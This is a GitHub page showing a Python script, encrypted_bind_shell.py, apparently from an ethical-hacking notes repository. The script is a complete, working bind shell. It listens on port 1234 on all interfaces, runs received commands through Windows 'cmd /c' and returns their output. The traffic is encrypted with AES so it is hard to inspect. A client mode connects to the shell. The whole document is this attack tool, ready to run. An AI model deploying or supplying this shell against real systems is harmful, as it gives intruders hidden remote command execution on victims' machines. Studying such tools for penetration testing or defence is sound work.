forked from SrivathsanNayak/ethical-hacking-notes
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathencrypted_bind_shell.py
122 lines (94 loc) · 3.26 KB
/
encrypted_bind_shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
import socket, subprocess, threading, argparse
# for encryption
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
DEFAULT_PORT = 1234
MAX_BUFFER = 4096
class AESCipher:
def __init__(self, key=None):
self.key = key if key else get_random_bytes(32)
self.cipher = AES.new(self.key, AES.MODE_ECB)
def encrypt(self, plaintext):
return self.cipher.encrypt(pad(plaintext, AES.block_size)).hex()
def decrypt(self, encrypted):
return unpad(self.cipher.decrypt(bytearray.fromhex(encrypted)), AES.block_size)
def __str__(self):
return "Key: {}".format(self.key.hex())
def encrypted_send(s, msg):
s.send(cipher.encrypt(msg).encode("latin-1"))
def execute_cmd(cmd):
try:
output = subprocess.check_output("cmd /c {}".format(cmd), stderr=subprocess.STDOUT)
except:
output = b"Command failed"
return output
def decode_and_strip(s):
return s.decode("latin-1").strip()
# for using threading
def shell_thread(s):
encrypted_send(s, b"Connected to bind shell")
try:
while True:
encrypted_send(s, b"\r\nEnter command: ")
data = s.recv(MAX_BUFFER)
if data:
buffer = cipher.decrypt(decode_and_strip(data))
buffer = decode_and_strip(buffer)
if not buffer or buffer == "exit":
s.close()
exit()
print("Executinc command: '{}'".format(buffer))
encrypted_send(s, execute_cmd(buffer))
except:
s.close()
exit()
def send_thread(s):
try:
while True:
data = input() + "\n"
encrypted_send(s, data.encode("latin-1"))
except:
s.close()
exit()
def recv_thread(s):
try:
while True:
data = decode_and_strip(s.recv(MAX_BUFFER))
if data:
data = cipher.decrypt(data).decode("latin-1")
print(data, end="", flush=True)
except:
s.close()
exit()
def server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", DEFAULT_PORT))
s.listen()
print("Starting bind shell")
while True:
client_socket, addr = s.accept()
print("New user connected")
threading.Thread(target=shell_thread, args=(client_socket, )).start()
def client(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, DEFAULT_PORT))
print("Connecting to bind shell")
threading.Thread(target=send_thread, args=(s,)).start()
threading.Thread(target=recv_thread, args=(s,)).start()
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--listen", action="store_true", help="Setup bind shell", required=False)
parser.add_argument("-c", "--connect", help="Connect to bind shell", required=False)
parser.add_argument("-k", "--key", help="Encryption key", type=str, required=False)
args = parser.parse_args()
if args.connect and not args.key:
parser.error("-c CONNECT requires -k KEY")
if args.key:
cipher = AESCipher(bytearray.fromhex(args.key))
else:
cipher = AESCipher()
print(cipher)
if args.listen:
server()
elif args.connect:
client(args.connect)